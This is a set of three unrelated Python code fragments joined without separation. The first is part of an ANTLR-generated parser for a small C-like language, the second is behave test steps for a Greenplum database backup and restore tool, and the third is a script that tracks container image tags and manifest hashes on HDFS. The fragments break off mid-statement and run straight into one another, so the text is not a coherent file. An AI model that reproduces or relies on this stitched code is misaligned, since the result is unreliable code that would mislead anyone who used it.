\21\2\u0090\u0095\5\"\22\2\u0091\u0095\5$\23") buf.write("\2\u0092\u0095\5&\24\2\u0093\u0095\5(\25\2\u0094\u008c") buf.write("\3\2\2\2\u0094\u008d\3\2\2\2\u0094\u008e\3\2\2\2\u0094") buf.write("\u008f\3\2\2\2\u0094\u0090\3\2\2\2\u0094\u0091\3\2\2\2") buf.write("\u0094\u0092\3\2\2\2\u0094\u0093\3\2\2\2\u0095\33\3\2") buf.write("\2\2\u0096\u0097\7\21\2\2\u0097\u0098\7&\2\2\u0098\u0099") buf.write("\5*\26\2\u0099\u009a\7\'\2\2\u009a\u009d\5\32\16\2\u009b") buf.write("\u009c\7\22\2\2\u009c\u009e\5\32\16\2\u009d\u009b\3\2") buf.write("\2\2\u009d\u009e\3\2\2\2\u009e\35\3\2\2\2\u009f\u00a1") buf.write("\7\f\2\2\u00a0\u00a2\5\32\16\2\u00a1\u00a0\3\2\2\2\u00a2") buf.write("\u00a3\3\2\2\2\u00a3\u00a1\3\2\2\2\u00a3\u00a4\3\2\2\2") buf.write("\u00a4\u00a5\3\2\2\2\u00a5\u00a6\7\r\2\2\u00a6\u00a7\5") buf.write("*\26\2\u00a7\u00a8\7-\2\2\u00a8\37\3\2\2\2\u00a9\u00aa") buf.write("\7\16\2\2\u00aa\u00ab\7&\2\2\u00ab\u00ac\5*\26\2\u00ac") buf.write("\u00ad\7-\2\2\u00ad\u00ae\5*\26\2\u00ae\u00af\7-\2\2\u00af") buf.write("\u00b0\5*\26\2\u00b0\u00b1\7\'\2\2\u00b1\u00b2\5\32\16") buf.write("\2\u00b2!\3\2\2\2\u00b3\u00b4\7\17\2\2\u00b4\u00b5\7-") buf.write("\2\2\u00b5#\3\2\2\2\u00b6\u00b7\7\20\2\2\u00b7\u00b8\7") buf.write("-\2\2\u00b8%\3\2\2\2\u00b9\u00bb\7\23\2\2\u00ba\u00bc") buf.write("\5*\26\2\u00bb\u00ba\3\2\2\2\u00bb\u00bc\3\2\2\2\u00bc") buf.write("\u00bd\3\2\2\2\u00bd\u00be\7-\2\2\u00be\'\3\2\2\2\u00bf") buf.write("\u00c0\5*\26\2\u00c0\u00c1\7-\2\2\u00c1)\3\2\2\2\u00c2") buf.write("\u00c3\5,\27\2\u00c3\u00c4\7%\2\2\u00c4\u00c5\5*\26\2") buf.write("\u00c5\u00c8\3\2\2\2\u00c6\u00c8\5,\27\2\u00c7\u00c2\3") buf.write("\2\2\2\u00c7\u00c6\3\2\2\2\u00c8+\3\2\2\2\u00c9\u00ca") buf.write("\b\27\1\2\u00ca\u00cb\5.\30\2\u00cb\u00d1\3\2\2\2\u00cc") buf.write("\u00cd\f\4\2\2\u00cd\u00ce\7\35\2\2\u00ce\u00d0\5.\30") buf.write("\2\u00cf\u00cc\3\2\2\2\u00d0\u00d3\3\2\2\2\u00d1\u00cf") buf.write("\3\2\2\2\u00d1\u00d2\3\2\2\2\u00d2-\3\2\2\2\u00d3\u00d1") buf.write("\3\2\2\2\u00d4\u00d5\b\30\1\2\u00d5\u00d6\5\60\31\2\u00d6") buf.write("\u00dc\3\2\2\2\u00d7\u00d8\f\4\2\2\u00d8\u00d9\7\36\2") buf.write("\2\u00d9\u00db\5\60\31\2\u00da\u00d7\3\2\2\2\u00db\u00de") buf.write("\3\2\2\2\u00dc\u00da\3\2\2\2\u00dc\u00dd\3\2\2\2\u00dd") buf.write("/\3\2\2\2\u00de\u00dc\3\2\2\2\u00df\u00e0\5\62\32\2\u00e0") buf.write("\u00e1\t\3\2\2\u00e1\u00e2\5\62\32\2\u00e2\u00e5\3\2\2") buf.write("\2\u00e3\u00e5\5\62\32\2\u00e4\u00df\3\2\2\2\u00e4\u00e3") buf.write("\3\2\2\2\u00e5\61\3\2\2\2\u00e6\u00e7\5\64\33\2\u00e7") buf.write("\u00e8\t\4\2\2\u00e8\u00e9\5\64\33\2\u00e9\u00ec\3\2\2") buf.write("\2\u00ea\u00ec\5\64\33\2\u00eb\u00e6\3\2\2\2\u00eb\u00ea") buf.write("\3\2\2\2\u00ec\63\3\2\2\2\u00ed\u00ee\b\33\1\2\u00ee\u00ef") buf.write("\5\66\34\2\u00ef\u00f5\3\2\2\2\u00f0\u00f1\f\4\2\2\u00f1") buf.write("\u00f2\t\5\2\2\u00f2\u00f4\5\66\34\2\u00f3\u00f0\3\2\2") buf.write("\2\u00f4\u00f7\3\2\2\2\u00f5\u00f3\3\2\2\2\u00f5\u00f6") buf.write("\3\2\2\2\u00f6\65\3\2\2\2\u00f7\u00f5\3\2\2\2\u00f8\u00f9") buf.write("\b\34\1\2\u00f9\u00fa\58\35\2\u00fa\u0100\3\2\2\2\u00fb") buf.write("\u00fc\f\4\2\2\u00fc\u00fd\t\6\2\2\u00fd\u00ff\58\35\2") buf.write("\u00fe\u00fb\3\2\2\2\u00ff\u0102\3\2\2\2\u0100\u00fe\3") buf.write("\2\2\2\u0100\u0101\3\2\2\2\u0101\67\3\2\2\2\u0102\u0100") buf.write("\3\2\2\2\u0103\u0104\t\7\2\2\u0104\u0107\58\35\2\u0105") buf.write("\u0107\5:\36\2\u0106\u0103\3\2\2\2\u0106\u0105\3\2\2\2") buf.write("\u01079\3\2\2\2\u0108\u0109\5<\37\2\u0109\u010a\7*\2\2") buf.write("\u010a\u010b\5*\26\2\u010b\u010c\7+\2\2\u010c\u010f\3") buf.write("\2\2\2\u010d\u010f\5<\37\2\u010e\u0108\3\2\2\2\u010e\u010d") buf.write("\3\2\2\2\u010f;\3\2\2\2\u0110\u0111\7&\2\2\u0111\u0112") buf.write("\5*\26\2\u0112\u0113\7\'\2\2\u0113\u0116\3\2\2\2\u0114") buf.write("\u0116\5> \2\u0115\u0110\3\2\2\2\u0115\u0114\3\2\2\2\u0116") buf.write("=\3\2\2\2\u0117\u011e\7\3\2\2\u0118\u011e\7\5\2\2\u0119") buf.write("\u011e\7\26\2\2\u011a\u011e\7\4\2\2\u011b\u011e\7\6\2") buf.write("\2\u011c\u011e\5@!\2\u011d\u0117\3\2\2\2\u011d\u0118\3") buf.write("\2\2\2\u011d\u0119\3\2\2\2\u011d\u011a\3\2\2\2\u011d\u011b") buf.write("\3\2\2\2\u011d\u011c\3\2\2\2\u011e?\3\2\2\2\u011f\u0120") buf.write("\7\26\2\2\u0120\u0121\7&\2\2\u0121\u0122\5B\"\2\u0122") buf.write("\u0123\7\'\2\2\u0123A\3\2\2\2\u0124\u0129\5*\26\2\u0125") buf.write("\u0126\7,\2\2\u0126\u0128\5*\26\2\u0127\u0125\3\2\2\2") buf.write("\u0128\u012b\3\2\2\2\u0129\u0127\3\2\2\2\u0129\u012a\3") buf.write("\2\2\2\u012a\u012d\3\2\2\2\u012b\u0129\3\2\2\2\u012c\u0124") buf.write("\3\2\2\2\u012c\u012d\3\2\2\2\u012dC\3\2\2\2\35FHW^dlw") buf.write("\u0080\u0085\u0087\u0094\u009d\u00a3\u00bb\u00c7\u00d1") buf.write("\u00dc\u00e4\u00eb\u00f5\u0100\u0106\u010e\u0115\u011d") buf.write("\u0129\u012c") return buf.getvalue() class MCParser ( Parser ): grammarFileName = "MC.g4" atn = ATNDeserializer().deserialize(serializedATN()) decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] sharedContextCache = PredictionContextCache() literalNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "'boolean'", "'int'", "'float'", "'string'", "'void'", "'do'", "'while'", "'for'", "'break'", "'continue'", "'if'", "'else'", "'return'", "'true'", "'false'", "<INVALID>", "'+'", "'-'", "'*'", "'/'", "'%'", "'!'", "'||'", "'&&'", "'=='", "'!='", "'<'", "'>'", "'<='", "'>='", "'='", "'('", "')'", "'{'", "'}'", "'['", "']'", "','", "';'" ] symbolicNames = [ "<INVALID>", "INTLIT", "FLOATLIT", "BOOLEANLIT", "STRINGLIT", "BOOLEANTYPE", "INTTYPE", "FLOATTYPE", "STRINGTYPE", "VOIDTYPE", "DO", "WHILE", "FOR", "BREAK", "CONTINUE", "IF", "ELSE", "RETURN", "TRUE", "FALSE", "ID", "ADD", "SUB", "MUL", "DIV", "MOD", "NOT", "OR", "AND", "EQ", "NE", "LT", "GT", "LE", "GE", "ASSIGN", "LB", "RB", "LP", "RP", "LSB", "RSB", "COMA", "SEMI", "CMTLINE", "CMTBLOCK", "WS", "UNCLOSE_STRING", "ILLEGAL_ESCAPE", "ERROR_CHAR" ] RULE_program = 0 RULE_var_declare = 1 RULE_prim_type = 2 RULE_varlist = 3 RULE_var = 4 RULE_func_declare = 5 RULE_func_type = 6 RULE_arraytype = 7 RULE_paralist = 8 RULE_paradcl = 9 RULE_para = 10 RULE_blockstmt = 11 RULE_stmt = 12 RULE_if_stmt = 13 RULE_while_stmt = 14 RULE_for_stmt = 15 RULE_break_stmt = 16 RULE_continue_stmt = 17 RULE_return_stmt = 18 RULE_expr_stmt = 19 RULE_expr0 = 20 RULE_expr1 = 21 RULE_expr2 = 22 RULE_expr3 = 23 RULE_expr4 = 24 RULE_expr5 = 25 RULE_expr6 = 26 RULE_expr7 = 27 RULE_expr8 = 28 RULE_expr9 = 29 RULE_operands = 30 RULE_calfunc = 31 RULE_arglist = 32 ruleNames = [ "program", "var_declare", "prim_type", "varlist", "var", "func_declare", "func_type", "arraytype", "paralist", "paradcl", "para", "blockstmt", "stmt", "if_stmt", "while_stmt", "for_stmt", "break_stmt", "continue_stmt", "return_stmt", "expr_stmt", "expr0", "expr1", "expr2", "expr3", "expr4", "expr5", "expr6", "expr7", "expr8", "expr9", "operands", "calfunc", "arglist" ] EOF = Token.EOF INTLIT=1 FLOATLIT=2 BOOLEANLIT=3 STRINGLIT=4 BOOLEANTYPE=5 INTTYPE=6 FLOATTYPE=7 STRINGTYPE=8 VOIDTYPE=9 DO=10 WHILE=11 FOR=12 BREAK=13 CONTINUE=14 IF=15 ELSE=16 RETURN=17 TRUE=18 FALSE=19 ID=20 ADD=21 SUB=22 MUL=23 DIV=24 MOD=25 NOT=26 OR=27 AND=28 EQ=29 NE=30 LT=31 GT=32 LE=33 GE=34 ASSIGN=35 LB=36 RB=37 LP=38 RP=39 LSB=40 RSB=41 COMA=42 SEMI=43 CMTLINE=44 CMTBLOCK=45 WS=46 UNCLOSE_STRING=47 ILLEGAL_ESCAPE=48 ERROR_CHAR=49 def __init__(self, input:TokenStream, output:TextIO = sys.stdout): super().__init__(input, output) self.checkVersion("4.7.1") self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache) self._predicates = None class ProgramContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def EOF(self): return self.getToken(MCParser.EOF, 0) def var_declare(self, i:int=None): if i is None: return self.getTypedRuleContexts(MCParser.Var_declareContext) else: return self.getTypedRuleContext(MCParser.Var_declareContext,i) def func_declare(self, i:int=None): if i is None: return self.getTypedRuleContexts(MCParser.Func_declareContext) else: return self.getTypedRuleContext(MCParser.Func_declareContext,i) def getRuleIndex(self): return MCParser.RULE_program def program(self): localctx = MCParser.ProgramContext(self, self._ctx, self.state) self.enterRule(localctx, 0, self.RULE_program) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 68 self._errHandler.sync(self) _la = self._input.LA(1) while True: self.state = 68 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,0,self._ctx) if la_ == 1: self.state = 66 self.var_declare() pass elif la_ == 2: self.state = 67 self.func_declare() pass self.state = 70 self._errHandler.sync(self) _la = self._input.LA(1) if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << MCParser.BOOLEANTYPE) | (1 << MCParser.INTTYPE) | (1 << MCParser.FLOATTYPE) | (1 << MCParser.STRINGTYPE) | (1 << MCParser.VOIDTYPE))) != 0)): break self.state = 72 self.match(MCParser.EOF) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Var_declareContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def prim_type(self): return self.getTypedRuleContext(MCParser.Prim_typeContext,0) def varlist(self): return self.getTypedRuleContext(MCParser.VarlistContext,0) def SEMI(self): return self.getToken(MCParser.SEMI, 0) def getRuleIndex(self): return MCParser.RULE_var_declare def var_declare(self): localctx = MCParser.Var_declareContext(self, self._ctx, self.state) self.enterRule(localctx, 2, self.RULE_var_declare) try: self.enterOuterAlt(localctx, 1) self.state = 74 self.prim_type() self.state = 75 self.varlist() self.state = 76 self.match(MCParser.SEMI) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Prim_typeContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BOOLEANTYPE(self): return self.getToken(MCParser.BOOLEANTYPE, 0) def INTTYPE(self): return self.getToken(MCParser.INTTYPE, 0) def FLOATTYPE(self): return self.getToken(MCParser.FLOATTYPE, 0) def STRINGTYPE(self): return self.getToken(MCParser.STRINGTYPE, 0) def getRuleIndex(self): return MCParser.RULE_prim_type def prim_type(self): localctx = MCParser.Prim_typeContext(self, self._ctx, self.state) self.enterRule(localctx, 4, self.RULE_prim_type) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 78 _la = self._input.LA(1) if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << MCParser.BOOLEANTYPE) | (1 << MCParser.INTTYPE) | (1 << MCParser.FLOATTYPE) | (1 << MCParser.STRINGTYPE))) != 0)): self._errHandler.recoverInline(self) else: self._errHandler.reportMatch(self) self.consume() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class VarlistContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def var(self): return self.getTypedRuleContext(MCParser.VarContext,0) def COMA(self, i:int=None): if i is None: return self.getTokens(MCParser.COMA) else: return self.getToken(MCParser.COMA, i) def varlist(self, i:int=None): if i is None: return self.getTypedRuleContexts(MCParser.VarlistContext) else: return self.getTypedRuleContext(MCParser.VarlistContext,i) def getRuleIndex(self): return MCParser.RULE_varlist def varlist(self): localctx = MCParser.VarlistContext(self, self._ctx, self.state) self.enterRule(localctx, 6, self.RULE_varlist) try: self.enterOuterAlt(localctx, 1) self.state = 80 self.var() self.state = 85 self._errHandler.sync(self) _alt = self._interp.adaptivePredict(self._input,2,self._ctx) while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER: if _alt==1: self.state = 81 self.match(MCParser.COMA) self.state = 82 self.varlist() self.state = 87 self._errHandler.sync(self) _alt = self._interp.adaptivePredict(self._input,2,self._ctx) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class VarContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def ID(self): return self.getToken(MCParser.ID, 0) def LSB(self): return self.getToken(MCParser.LSB, 0) def INTLIT(self): return self.getToken(MCParser.INTLIT, 0) def RSB(self): return self.getToken(MCParser.RSB, 0) def getRuleIndex(self): return MCParser.RULE_var def var(self): localctx = MCParser.VarContext(self, self._ctx, self.state) self.enterRule(localctx, 8, self.RULE_var) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 88 self.match(MCParser.ID) self.state = 92 self._errHandler.sync(self) _la = self._input.LA(1) if _la==MCParser.LSB: self.state = 89 self.match(MCParser.LSB) self.state = 90 self.match(MCParser.INTLIT) self.state = 91 self.match(MCParser.RSB) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Func_declareContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def func_type(self): return self.getTypedRuleContext(MCParser.Func_typeContext,0) def ID(self): return self.getToken(MCParser.ID, 0) def LB(self): return self.getToken(MCParser.LB, 0) def RB(self): return self.getToken(MCParser.RB, 0) def blockstmt(self): return self.getTypedRuleContext(MCParser.BlockstmtContext,0) def paralist(self): return self.getTypedRuleContext(MCParser.ParalistContext,0) def getRuleIndex(self): return MCParser.RULE_func_declare def func_declare(self): localctx = MCParser.Func_declareContext(self, self._ctx, self.state) self.enterRule(localctx, 10, self.RULE_func_declare) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 94 self.func_type() self.state = 95 self.match(MCParser.ID) self.state = 96 self.match(MCParser.LB) self.state = 98 self._errHandler.sync(self) _la = self._input.LA(1) if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << MCParser.BOOLEANTYPE) | (1 << MCParser.INTTYPE) | (1 << MCParser.FLOATTYPE) | (1 << MCParser.STRINGTYPE))) != 0): self.state = 97 self.paralist() self.state = 100 self.match(MCParser.RB) self.state = 101 self.blockstmt() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Func_typeContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def prim_type(self): return self.getTypedRuleContext(MCParser.Prim_typeContext,0) def arraytype(self): return self.getTypedRuleContext(MCParser.ArraytypeContext,0) def VOIDTYPE(self): return self.getToken(MCParser.VOIDTYPE, 0) def getRuleIndex(self): return MCParser.RULE_func_type def func_type(self): localctx = MCParser.Func_typeContext(self, self._ctx, self.state) self.enterRule(localctx, 12, self.RULE_func_type) try: self.state = 106 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,5,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 103 self.prim_type() pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 104 self.arraytype() pass elif la_ == 3: self.enterOuterAlt(localctx, 3) self.state = 105 self.match(MCParser.VOIDTYPE) pass except
context.full_backup_timestamp dir = "%s/db_dumps/%s" % (path, context.backup_subdir) cleanup_cmd = "rm -f %s/%s" % (dir, file_pattern) run_command(context, cleanup_cmd) if context.exception: raise context.exception @given('there are no backup files') @then('there are no backup files') @when('there are no backup files') def impl(context): cleanup_backup_files(context, 'template1') @given('the backup files in "{location}" are deleted') @when('the backup files in "{location}" are deleted') @then('the backup files in "{location}" are deleted') def impl(context, location): cleanup_backup_files(context, 'template1', location) @then('there are no report files in the master data directory') def impl(context): cleanup_report_files(context, master_data_dir) @when('verify that partitioned tables "{table_list}" in "{dbname}" has {num_parts} empty partitions') @then('verify that partitioned tables "{table_list}" in "{dbname}" has {num_parts} empty partitions') def impl(context, table_list, dbname, num_parts): expected_num_parts = int(num_parts.strip()) tables = [t.strip() for t in table_list.split(',')] for t in tables: check_x_empty_parts(dbname, t, expected_num_parts) @given('a backup file of tables "{table_list}" in "{dbname}" exists for validation') @when('a backup file of tables "{table_list}" in "{dbname}" exists for validation') @then('a backup file of tables "{table_list}" in "{dbname}" exists for validation') def impl(context, table_list, dbname): tables = [t.strip() for t in table_list.split(',')] for t in tables: backup_data(context, t.strip(), dbname) @when( 'verify that there is a table "{tablename}" of "{tabletype}" type in "{dbname}" with same data as table "{backedup_table}"') @then( 'verify that there is a table "{tablename}" of "{tabletype}" type in "{dbname}" with same data as table "{backedup_table}"') def impl(context, tablename, tabletype, dbname, backedup_table): if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=tabletype): raise Exception("Table '%s' does not exist when it should" % tablename) validate_restore_data(context, tablename, dbname, backedup_table) @when('check that there is a "{table_type}" table "{tablename}" in "{dbname}" with same data from "{backedup_dbname}"') @then('check that there is a "{table_type}" table "{tablename}" in "{dbname}" with same data from "{backedup_dbname}"') def impl(context, table_type, tablename, dbname, backedup_dbname): if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=table_type): raise Exception("Table '%s' does not exist when it should" % tablename) validate_restore_data(context, tablename, dbname, None, backedup_dbname) @when('verify that there is a "{table_type}" table "{tablename}" in "{dbname}" with data') @then('verify that there is a "{table_type}" table "{tablename}" in "{dbname}" with data') def impl(context, table_type, tablename, dbname): if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=table_type): raise Exception("Table '%s' does not exist when it should" % tablename) validate_restore_data(context, tablename, dbname) @given('schema "{schema_list}" exists in "{dbname}"') @then('schema "{schema_list}" exists in "{dbname}"') def impl(context, schema_list, dbname): schemas = [s.strip() for s in schema_list.split(',')] for s in schemas: drop_schema_if_exists(context, s.strip(), dbname) create_schema(context, s.strip(), dbname) @then('the temporary file "{filename}" is removed') def impl(context, filename): if os.path.exists(filename): os.remove(filename) @then('the temporary table file "{filename}" is removed') def impl(context, filename): table_file = 'test/behave/mgmt_utils/steps/data/gptransfer/%s' % filename if os.path.exists(table_file): os.remove(table_file) def create_table_file_locally(context, filename, table_list, location=os.getcwd()): tables = table_list.split('|') file_path = os.path.join(location, filename) with open(file_path, 'w') as fp: for t in tables: fp.write(t + '\n') context.filename = file_path @given('there is a file "{filename}" with tables "{table_list}"') @then('there is a file "{filename}" with tables "{table_list}"') def impl(context, filename, table_list): create_table_file_locally(context, filename, table_list) @given('there is a fake pg_aoseg table named "{table}" in "{dbname}"') def impl(context, table, dbname): create_fake_pg_aoseg_table(context, table, dbname) def verify_file_contents(context, file_type, file_dir, text_find, should_contain=True): if len(file_dir.strip()) == 0: file_dir = master_data_dir if not hasattr(context, "dump_prefix"): context.dump_prefix = '' if file_type == 'pg_dump_log': fn = 'pg_dump_log' context.backup_timestamp = '0' elif file_type == 'report': fn = '%sgp_dump_%s.rpt' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'status': fn = '%sgp_dump_status_*_1_%s' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'filter': fn = '%sgp_dump_%s_filter' % (context.dump_prefix, context.backup_timestamp) elif file_type == "statistics": fn = '%sgp_statistics_*_1_%s' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'schema': fn = '%sgp_dump_%s_schema' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'cdatabase': fn = '%sgp_cdatabase_*_1_%s' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'dump': fn = '%sgp_dump_*_1_%s.gz' % (context.dump_prefix, context.backup_timestamp) subdirectory = context.backup_timestamp[0:8] if file_type == 'pg_dump_log': full_path = os.path.join(file_dir, fn) else: full_path = glob.glob(os.path.join(file_dir, 'db_dumps', subdirectory, fn))[0] if not os.path.isfile(full_path): raise Exception("Can not find %s file: %s" % (file_type, full_path)) contents = "" if file_type == 'dump': fd = gzip.open(full_path) else: fd = open(full_path) contents = fd.read() fd.close() if should_contain and not text_find in contents: raise Exception("Did not find '%s' in file %s" % (text_find, full_path)) elif not should_contain and text_find in contents: raise Exception("Found '%s' in file '%s'" % (text_find, full_path)) @then('verify that the "{file_type}" file in "{file_dir}" dir contains "{text_find}"') def impl(context, file_type, file_dir, text_find): verify_file_contents(context, file_type, file_dir, text_find) @then('verify that the "{file_type}" file in "{file_dir}" dir does not contain "{text_find}"') def impl(context, file_type, file_dir, text_find): verify_file_contents(context, file_type, file_dir, text_find, should_contain=False) @then('the timestamp in the report file should be same as timestamp key') def impl(context): if not hasattr(context, 'timestamp_key'): raise Exception('Unable to find timestamp key in context') if hasattr(context, 'backup_dir'): report_file = os.path.join(context.backup_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8]), 'gp_dump_%s.rpt' % context.timestamp_key) else: report_file = os.path.join(master_data_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8]), 'gp_dump_%s.rpt' % context.timestamp_key) with open(report_file) as rpt: for line in rpt: if line.startswith('Timestamp Key'): timestamp_key = line.split(':')[-1].strip() if timestamp_key != context.timestamp_key: raise Exception('Expected timestamp key to be %s, but found %s in report file %s' % ( context.timestamp_key, timestamp_key, report_file)) @then('there should be dump files with filename having timestamp key in "{dbname}"') def impl(context, dbname): if not hasattr(context, 'timestamp_key'): raise Exception('Unable to find timestamp key in context') master_hostname = get_master_hostname(dbname) results = get_hosts_and_datadirs(dbname) for (host, datadir) in results: if host == master_hostname: if hasattr(context, 'backup_dir'): dump_dir = os.path.join(context.backup_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) else: dump_dir = os.path.join(master_data_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) master_dump_files = ['%s/gp_dump_-1_1_%s' % (dump_dir, context.timestamp_key), '%s/gp_dump_status_-1_1_%s' % (dump_dir, context.timestamp_key), '%s/gp_cdatabase_-1_1_%s' % (dump_dir, context.timestamp_key), '%s/gp_dump_-1_1_%s_post_data' % (dump_dir, context.timestamp_key)] for dump_file in master_dump_files: cmd = Command('check for dump files', 'ls -1 %s | wc -l' % (dump_file)) cmd.run(validateAfter=True) if int(cmd.get_stdout()) != 1: raise Exception('Dump file %s not found after gp_dump on host %s' % (dump_file, host)) else: if hasattr(context, 'backup_dir'): dump_dir = os.path.join(context.backup_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) else: dump_dir = os.path.join(datadir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) segment_dump_files = ['%s/gp_dump_*_*_%s' % (dump_dir, context.timestamp_key), '%s/gp_dump_status_*_*_%s' % (dump_dir, context.timestamp_key)] for dump_file in segment_dump_files: cmd = Command('check for dump files', 'ls -1 %s | wc -l' % (dump_file), ctxt=REMOTE, remoteHost=host) cmd.run(validateAfter=True) if int(cmd.get_stdout()) != 1: raise Exception('Dump file %s not found after gp_dump on host %s' % (dump_file, host)) @then('"{filetype}" file should not be created under "{dir}"') def impl(context, filetype, dir): if not hasattr(context, 'backup_timestamp'): raise Exception('Unable to find out the %s because backup timestamp has not been stored' % filetype) if filetype == "dirty_list": filename = 'gp_dump_%s_dirty_list' % context.backup_timestamp elif filetype == "plan": filename = 'gp_restore_%s_plan' % context.backup_timestamp elif filetype == 'pipes': filename = 'gp_dump_%s_pipes' % context.backup_timestamp elif filetype == 'regular_files': filename = 'gp_dump_%s_regular_files' % context.backup_timestamp else: raise Exception("Unknown filetype '%s' specified" % filetype) dump_dir = dir if len(dir.strip()) != 0 else master_data_dir file_path = os.path.join(dump_dir, 'db_dumps', context.backup_timestamp[0:8], filename) if os.path.exists(file_path): raise Exception("File path %s should not exist for filetype '%s'" % (file_path, filetype)) def get_plan_filename(context): filename = 'gp_restore_%s_plan' % context.backup_timestamp return os.path.join(master_data_dir, 'db_dumps', context.backup_timestamp[0:8], filename) def get_dirty_list_filename(context, backup_dir=None): if not backup_dir: backup_dir = master_data_dir if not hasattr(context, "dump_prefix"): context.dump_prefix = '' filename = '%sgp_dump_%s_dirty_list' % (context.dump_prefix, context.backup_timestamp) return os.path.join(backup_dir, 'db_dumps', context.backup_timestamp[0:8], filename) @then('plan file should match "{filename}"') def impl(context, filename): current_path = os.path.realpath(__file__) current_dir = os.path.dirname(current_path) golden_filename = "%s/%s" % (current_dir, filename) generated_filename = get_plan_filename(context) diff_files(golden_filename, generated_filename) def parse_plan_file(filename): plan = {} with open(filename) as fd: for line in fd: parts = line.partition(":") ts = parts[0].strip() if ts not in plan: plan[ts] = set() tables = parts[2].split(",") for t in tables: if t not in plan[ts]: plan[ts].add(t.strip()) return plan def modify_plan_with_labels(context, expected_plan, scenario_number=""): labels_key = 'timestamp_labels' + scenario_number newplan = {} for k in expected_plan: if k not in global_labels[labels_key]: raise Exception("Label '%s' not specified in behave test" % k) ts = global_labels[labels_key][k] newplan[ts] = expected_plan[k] return newplan def compare_plans(expected, actual): expected_keys = expected.keys() actual_keys = actual.keys() if len(expected_keys) != len(actual_keys): raise Exception( "Expected plan has %s timestamps actual plan has %s timestamps" % (len(expected_keys), len(actual_keys))) for k in expected: if k not in actual: raise Exception("Expected timestamp in plan and did not find it: %s " % k) expected_tables = sorted(expected[k]) actual_tables = sorted(actual[k]) if expected_tables != actual_tables: print "Expected plan: %s" % expected print "Actual plan: %s" % actual raise Exception("Tables in plan for timestamp '%s' do not match expected tables" % k) @then('the plan file is validated against "{expected_plan}"') def impl(context, expected_plan): context.restore_plan = parse_plan_file(get_plan_filename(context)) current_path = os.path.realpath(__file__) current_dir = os.path.dirname(current_path) expected_file = '%s/%s' % (current_dir, expected_plan) expected_plan = parse_plan_file(expected_file) expected_plan = modify_plan_with_labels(context,
tags: comment = ', '.join(map(str, value[1])) if comment > 0: comment = "#" + comment file_contents.append(tags + ":" + manifest_hash + comment + "\n") file_contents.sort() with open(image_tag_to_hash, 'w') as file_pointer: for val in file_contents: file_pointer.write(val) def update_dicts_for_multiple_tags(hash_to_tags, tag_to_hash, tags, manifest_hash, comment): for tag in tags: update_dicts(hash_to_tags, tag_to_hash, tag, manifest_hash, comment) def update_dicts(hash_to_tags, tag_to_hash, tag, manifest_hash, comment): remove_tag_from_dicts(hash_to_tags, tag_to_hash, tag) add_tag_to_dicts(hash_to_tags, tag_to_hash, tag, manifest_hash, comment) def remove_from_dicts(hash_to_tags, tag_to_hash, tags): for tag in tags: logging.debug("removing tag: %s", tag) remove_tag_from_dicts(hash_to_tags, tag_to_hash, tag) def populate_tag_dicts(hdfs_root, image_tag_to_hash, local_image_tag_to_hash): if does_hdfs_entry_exist(hdfs_root + "/" + image_tag_to_hash): hdfs_get(hdfs_root + "/" + image_tag_to_hash, local_image_tag_to_hash) image_tag_to_hash_hash = calculate_file_hash(local_image_tag_to_hash) else: image_tag_to_hash_hash = 0 if image_tag_to_hash_hash != 0: hash_to_tags, tag_to_hash = 